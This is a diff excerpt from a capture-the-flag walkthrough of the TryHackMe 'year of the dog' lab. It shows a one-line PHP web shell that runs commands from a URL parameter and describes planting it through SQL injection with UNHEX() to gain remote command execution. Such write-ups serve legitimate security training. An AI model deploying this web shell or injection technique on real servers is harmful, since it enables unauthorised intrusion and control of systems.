0xV1RU/Walkthroughs/TryHackMe/year of the dog/walkthrough.md

 A simple PHP web shell was prepared:`<?php system($_GET['cmd']); ?>`
 The PHP code was converted into hexadecimal format and written to the web directory using SQL injection with the UNHEX() function.
 The file was saved as: `text.php`

-Once accessed through the browser, it allowed execution of system commands via URL parameters.
-This confirmed remote command execution capability.
+Once accessed through the browser, it allowed execution of system commands via URL parameters.This confirmed that arbitrary system commands could be executed on the target server.
 ![text php](https://github.com/user-attachments/assets/5f45585c-7b1a-4040-a75a-e1648108c87a)
 ![text_php visible on browser](https://github.com/user-attachments/assets/bac64aca-d75a-4b10-a246-0da88eb63eb8)
 ![execute any command](https://github.com/user-attachments/assets/89b4bb3e-a3bd-4bed-9523-69781d3e9a73)